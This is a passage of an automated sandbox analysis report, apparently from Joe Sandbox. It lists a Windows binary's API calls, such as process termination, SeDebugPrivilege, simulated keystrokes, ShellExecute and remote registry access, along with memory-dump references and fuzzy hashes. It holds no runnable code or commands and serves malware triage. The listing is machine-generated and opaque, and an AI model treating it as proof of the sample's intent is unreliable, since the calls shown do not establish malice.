                                                                                                                                  • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00EFBD33
                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 00EFBD5D
                                                                                                                                  • StringFromGUID2.COMBASE(?,?,00000028), ref: 00EFBEAD
                                                                                                                                  • ProgIDFromCLSID.COMBASE(?,?), ref: 00EFBEF7
                                                                                                                                  • CoTaskMemFree.COMBASE(?), ref: 00EFBF14
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                   • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                   • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                   • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                   • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                   • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                   • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                   • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Free$FromString$FileLibraryModuleNamePathProgQueryTaskType
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 793797124-0
                                                                                                                                  • Opcode ID: 3aa13507ebd2eb755481e36b629a7f360d9ab680a698fd7acc052711bb0da618
                                                                                                                                  • Instruction ID: ca53edd6923cc6c24e712ac4972d40a8233753248da17c6d4458300d6ee0ac5f
                                                                                                                                  • Opcode Fuzzy Hash: 3aa13507ebd2eb755481e36b629a7f360d9ab680a698fd7acc052711bb0da618
                                                                                                                                  • Instruction Fuzzy Hash: 45F1E675A00109EFCB14DFA4C884EBEB7B9FF89714F149499FA15AB250DB31AE42CB50
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EA49CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00EA4954,00000000), ref: 00EA4A23
                                                                                                                                  • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00EBB85B), ref: 00EBB926
                                                                                                                                  • KillTimer.USER32(00000000,?,00000000,?,?,?,?,00EBB85B,00000000,?,?,00EBAF1E,?,?), ref: 00EBB9BD
                                                                                                                                  • DestroyAcceleratorTable.USER32(00000000), ref: 00F1E775
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00F1E7EB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                   • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                   • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                   • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                   • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                   • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                   • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                   • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2402799130-0
                                                                                                                                  • Opcode ID: b175a2d8f5fd8a7bc4fe0c50d51a160938b18669015a0e74a612f40d2ea3186f
                                                                                                                                  • Instruction ID: 283c049710460b0e27d04903fd3a463b855fc54908fab21383cb81d18cf6fcf4
                                                                                                                                  • Opcode Fuzzy Hash: b175a2d8f5fd8a7bc4fe0c50d51a160938b18669015a0e74a612f40d2ea3186f
                                                                                                                                  • Instruction Fuzzy Hash: 9161BD30500705CFDB359F25D888BAABBF5FF85325F181519E5A6975B0C7F0A891EB40
                                                                                                                                  APIs
                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00F0B204
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                   • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                   • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                   • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                   • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                   • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                   • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                   • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InvalidateRect
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 634782764-0
                                                                                                                                  • Opcode ID: 730879d4cd8162c4e12a419578b5300c36f3d95c44897757af0dadd3cfb3c3b9
                                                                                                                                  • Instruction ID: 6f1f0ded0141e7ca2e345ce7da323da2e0ddd85fea16050b995c03e6ef219d2c
                                                                                                                                  • Opcode Fuzzy Hash: 730879d4cd8162c4e12a419578b5300c36f3d95c44897757af0dadd3cfb3c3b9
                                                                                                                                  • Instruction Fuzzy Hash: B7519031A00208BFEF319F28CC99F9E7BA5EB06724F204112F955E61E1C771E990BB90
                                                                                                                                  APIs
                                                                                                                                  • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00F1E9EA
                                                                                                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00F1EA0B
                                                                                                                                  • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00F1EA20
                                                                                                                                  • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00F1EA3D
                                                                                                                                  • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00F1EA64
                                                                                                                                  • DestroyCursor.USER32(00000000), ref: 00F1EA6F
                                                                                                                                  • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00F1EA8C
                                                                                                                                  • DestroyCursor.USER32(00000000), ref: 00F1EA97
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                   • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                   • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                   • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                   • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                   • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                   • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                   • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CursorDestroyExtractIconImageLoadMessageSend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3992029641-0
                                                                                                                                  APIs
                                                                                                                                  • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00F1E9A0,00000004,00000000,00000000), ref: 00EBF737
                                                                                                                                  • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,00F1E9A0,00000004,00000000,00000000), ref: 00EBF77E
                                                                                                                                  • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,00F1E9A0,00000004,00000000,00000000), ref: 00F1EB55
                                                                                                                                  • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00F1E9A0,00000004,00000000,00000000), ref: 00F1EBC1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ShowWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1268545403-0
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EDE138: GetWindowThreadProcessId.USER32(?,00000000), ref: 00EDE158
                                                                                                                                    • Part of subcall function 00EDE138: GetCurrentThreadId.KERNEL32 ref: 00EDE15F
                                                                                                                                    • Part of subcall function 00EDE138: AttachThreadInput.USER32(00000000,?,00EDCDFB,?,00000001), ref: 00EDE166
                                                                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00EDCE06
                                                                                                                                  • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00EDCE23
                                                                                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00EDCE26
                                                                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00EDCE2F
                                                                                                                                  • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00EDCE4D
                                                                                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00EDCE50
                                                                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00EDCE59
                                                                                                                                  • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00EDCE70
                                                                                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00EDCE73
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2014098862-0
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EDA857: CLSIDFromProgID.COMBASE ref: 00EDA874
                                                                                                                                    • Part of subcall function 00EDA857: ProgIDFromCLSID.COMBASE(?,00000000), ref: 00EDA88F
                                                                                                                                    • Part of subcall function 00EDA857: lstrcmpiW.KERNEL32(?,00000000), ref: 00EDA89D
                                                                                                                                    • Part of subcall function 00EDA857: CoTaskMemFree.COMBASE(00000000), ref: 00EDA8AD
                                                                                                                                  • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 00EFC6AD
                                                                                                                                  • _memset.LIBCMT ref: 00EFC6BA
                                                                                                                                  • _memset.LIBCMT ref: 00EFC7D8
                                                                                                                                  • CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,00000001), ref: 00EFC804
                                                                                                                                  • CoTaskMemFree.COMBASE(?), ref: 00EFC80F
                                                                                                                                  Strings
                                                                                                                                  • NULL Pointer assignment, xrefs: 00EFC85D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                                  • String ID: NULL Pointer assignment
                                                                                                                                  • API String ID: 1300414916-2785691316
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00F09926
                                                                                                                                  • SendMessageW.USER32(?,00001036,00000000,?), ref: 00F0993A
                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00F09954
                                                                                                                                  • _wcscat.LIBCMT ref: 00F099AF
                                                                                                                                  • SendMessageW.USER32(?,00001057,00000000,?), ref: 00F099C6
                                                                                                                                  • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00F099F4
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Window_wcscat
                                                                                                                                  • String ID: SysListView32
                                                                                                                                  • API String ID: 307300125-78025650
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EE6F5B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00EE6F7D
                                                                                                                                    • Part of subcall function 00EE6F5B: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00EE6F8D
                                                                                                                                    • Part of subcall function 00EE6F5B: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00EE7022
                                                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F0168B
                                                                                                                                  • GetLastError.KERNEL32 ref: 00F0169E
                                                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F016CA
                                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00F01746
                                                                                                                                  • GetLastError.KERNEL32(00000000), ref: 00F01751
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00F01786
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                  • String ID: SeDebugPrivilege
                                                                                                                                  • API String ID: 2533919879-2896544425
                                                                                                                                  APIs
                                                                                                                                  • LoadIconW.USER32(00000000,00007F03), ref: 00EE62D6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: IconLoad
                                                                                                                                  • String ID: blank$info$question$stop$warning
                                                                                                                                  • API String ID: 2457776203-404129466
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000100,00000000), ref: 00EE7595
                                                                                                                                  • LoadStringW.USER32(00000000), ref: 00EE759C
                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00EE75B2
                                                                                                                                  • LoadStringW.USER32(00000000), ref: 00EE75B9
                                                                                                                                  • _wprintf.LIBCMT ref: 00EE75DF
                                                                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00EE75FD
                                                                                                                                  Strings
                                                                                                                                  • %s (%d) : ==> %s: %s %s, xrefs: 00EE75DA
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                                  • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                  • API String ID: 3648134473-3128320259
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EACAEE: _memmove.LIBCMT ref: 00EACB2F
                                                                                                                                    • Part of subcall function 00F03AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F02AA6,?,?), ref: 00F03B0E
                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F02AE7
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BuffCharConnectRegistryUpper_memmove
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3479070676-0
                                                                                                                                  APIs
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$_memmovehtonsinet_ntoaselect
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1718709218-0
                                                                                                                                  APIs
                                                                                                                                  • __mtinitlocknum.LIBCMT ref: 00ECB744
                                                                                                                                    • Part of subcall function 00EC8A0C: __FF_MSGBANNER.LIBCMT ref: 00EC8A21
                                                                                                                                    • Part of subcall function 00EC8A0C: __NMSG_WRITE.LIBCMT ref: 00EC8A28
                                                                                                                                    • Part of subcall function 00EC8A0C: __malloc_crt.LIBCMT ref: 00EC8A48
                                                                                                                                  • __lock.LIBCMT ref: 00ECB757
                                                                                                                                  • __lock.LIBCMT ref: 00ECB7A3
                                                                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00F56948,00000018,00ED6C2B,?,00000000,00000109), ref: 00ECB7BF
                                                                                                                                  • RtlEnterCriticalSection.NTDLL(8000000C), ref: 00ECB7DC
                                                                                                                                  • RtlLeaveCriticalSection.NTDLL(8000000C), ref: 00ECB7EC
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1422805418-0
                                                                                                                                  APIs
                                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 00EEA1CE
                                                                                                                                    • Part of subcall function 00EC010A: std::exception::exception.LIBCMT ref: 00EC013E
                                                                                                                                    • Part of subcall function 00EC010A: __CxxThrowException@8.LIBCMT ref: 00EC0153
                                                                                                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00EEA205
                                                                                                                                  • RtlEnterCriticalSection.NTDLL(?), ref: 00EEA221
                                                                                                                                  • _memmove.LIBCMT ref: 00EEA26F
                                                                                                                                  • _memmove.LIBCMT ref: 00EEA28C
                                                                                                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 00EEA29B
                                                                                                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00EEA2B0
                                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00EEA2CF
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 256516436-0
                                                                                                                                  APIs
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00F08CF3
                                                                                                                                  • GetDC.USER32(00000000), ref: 00F08CFB
                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F08D06
                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00F08D12
                                                                                                                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00F08D4E
                                                                                                                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00F08D5F
                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00F0BB29,?,?,000000FF,00000000,?,000000FF,?), ref: 00F08D99
                                                                                                                                  • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00F08DB9
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3864802216-0
                                                                                                                                  • Opcode ID: 4e02a02f9a47e18d4efb7b7a6ae631b4c84c2e1bf7f6c78900680acff214f823
                                                                                                                                  • Instruction ID: a81ee47428065bea780629ca3efd5bb670fd2b72eb81103104283e84ea574265
                                                                                                                                  • Opcode Fuzzy Hash: 4e02a02f9a47e18d4efb7b7a6ae631b4c84c2e1bf7f6c78900680acff214f823
                                                                                                                                  • Instruction Fuzzy Hash: C9317C72201214BFEB208F50CC8AFEA3FA9EF49765F044155FE48DA1D1CA759842EBB0
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: df38972dca1e17ce789744884668cc04cf32d1d05369907a7be397d89a0d9936
                                                                                                                                  • Instruction ID: 8f04befb5d02daca2ced9f6cdb546e0f2192a3eab0602fffc2203f96dcbc3897
                                                                                                                                  • Opcode Fuzzy Hash: df38972dca1e17ce789744884668cc04cf32d1d05369907a7be397d89a0d9936
                                                                                                                                  • Instruction Fuzzy Hash: 6F716B71900109EFCB15CF98CC88AFFBB79FF85314F248159F965AA251D7709A42DB60
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 00F0214B
                                                                                                                                  • _memset.LIBCMT ref: 00F02214
                                                                                                                                  • ShellExecuteExW.SHELL32(?), ref: 00F02259
                                                                                                                                    • Part of subcall function 00EA84A6: __swprintf.LIBCMT ref: 00EA84E5
                                                                                                                                    • Part of subcall function 00EA84A6: __itow.LIBCMT ref: 00EA8519
                                                                                                                                    • Part of subcall function 00EA3BCF: _wcscpy.LIBCMT ref: 00EA3BF2
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00F02320
                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00F0232F
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                                                                                  • String ID: @
                                                                                                                                  • API String ID: 4082843840-2766056989
                                                                                                                                  • Opcode ID: 023a147e50194a8d01190f48a0d0f1bff3f604854d472ab67c2734805d2bfc7a
                                                                                                                                  • Instruction ID: 3463316525ad81f646bed95c82890fce6e4705e60009d6402cbd63b63c798520
                                                                                                                                  • Opcode Fuzzy Hash: 023a147e50194a8d01190f48a0d0f1bff3f604854d472ab67c2734805d2bfc7a
                                                                                                                                  • Instruction Fuzzy Hash: B7716B71A00619DFCF15EFA4C985A9EBBF5FF49310B108059E855BB391DB30AE41DBA0
                                                                                                                                  APIs
                                                                                                                                  • GetParent.USER32(?), ref: 00EE481D
                                                                                                                                  • GetKeyboardState.USER32(?), ref: 00EE4832
                                                                                                                                  • SetKeyboardState.USER32(?), ref: 00EE4893
                                                                                                                                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 00EE48C1
                                                                                                                                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 00EE48E0
                                                                                                                                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 00EE4926
                                                                                                                                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00EE4949
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 87235514-0
                                                                                                                                  • Opcode ID: 648b61cdc8e0d07e1e53d920d95ec1bff8cb2a3c7e382f237ed4943ce23f2e83
                                                                                                                                  • Instruction ID: dbb2c46308ab69e43351de58e40f28bb7761632d3d88a5787430029ccf69c70d
                                                                                                                                  • Opcode Fuzzy Hash: 648b61cdc8e0d07e1e53d920d95ec1bff8cb2a3c7e382f237ed4943ce23f2e83
                                                                                                                                  • Instruction Fuzzy Hash: 9051F5E09087DA3DFB3A46368C45BBBBEA95B46308F089589F1D5768C3C2D9EC84D750
                                                                                                                                  APIs
                                                                                                                                  • GetParent.USER32(00000000), ref: 00EE4638
                                                                                                                                  • GetKeyboardState.USER32(?), ref: 00EE464D
                                                                                                                                  • SetKeyboardState.USER32(?), ref: 00EE46AE
                                                                                                                                  • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00EE46DA
                                                                                                                                  • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00EE46F7
                                                                                                                                  • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00EE473B
                                                                                                                                  • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00EE475C
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 87235514-0
                                                                                                                                  • Opcode ID: 27ac593cba8be59abb7fba743674509c1920fb8695bc28fede20dbbbc721cb67
                                                                                                                                  • Instruction ID: 5b2457386bf60efc474923566eea3a2ec91ce401354e9a097f635b8e1e9e29ff
                                                                                                                                  • Opcode Fuzzy Hash: 27ac593cba8be59abb7fba743674509c1920fb8695bc28fede20dbbbc721cb67
                                                                                                                                  • Instruction Fuzzy Hash: B951D4E05047DA3DFB3687668C45BB6BFE96B07308F085489E1D5668C2D3E4EC98E790
                                                                                                                                  APIs
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcsncpy$LocalTime
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2945705084-0
                                                                                                                                  • Opcode ID: f7863c25a5a29b5c253d71edb25432d7977fa74da86c32d41201b5bb5d82d094
                                                                                                                                  • Instruction ID: 1068ac3a40aa41c1cd7c9cca94c1c42832070649191337dc0ded83ca09fdf92f
                                                                                                                                  • Opcode Fuzzy Hash: f7863c25a5a29b5c253d71edb25432d7977fa74da86c32d41201b5bb5d82d094
                                                                                                                                  • Instruction Fuzzy Hash: 52418166C1025875CF14EBF4C986ECFB7ECEF05710F50A46AE918F3122EA31E25287A5
                                                                                                                                  APIs
                                                                                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00F03C92
                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F03CBC
                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00F03D71
                                                                                                                                    • Part of subcall function 00F03C63: RegCloseKey.ADVAPI32(?), ref: 00F03CD9
                                                                                                                                    • Part of subcall function 00F03C63: FreeLibrary.KERNEL32(?), ref: 00F03D2B
                                                                                                                                    • Part of subcall function 00F03C63: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00F03D4E
                                                                                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00F03D16
                                                                                                                                  Similarity
                                                                                                                                  • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 395352322-0
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00F08DF4
                                                                                                                                  • GetWindowLongW.USER32(0111B0E8,000000F0), ref: 00F08E27
                                                                                                                                  • GetWindowLongW.USER32(0111B0E8,000000F0), ref: 00F08E5C
                                                                                                                                  • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00F08E8E
                                                                                                                                  • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00F08EB8
                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00F08EC9
                                                                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00F08EE3
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LongWindow$MessageSend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2178440468-0
                                                                                                                                  APIs
                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00EE1734
                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00EE175A
                                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 00EE175D
                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 00EE177B
                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 00EE1784
                                                                                                                                  • StringFromGUID2.COMBASE(?,?,00000028), ref: 00EE17A9
                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 00EE17B7
                                                                                                                                  Memory Dump Source
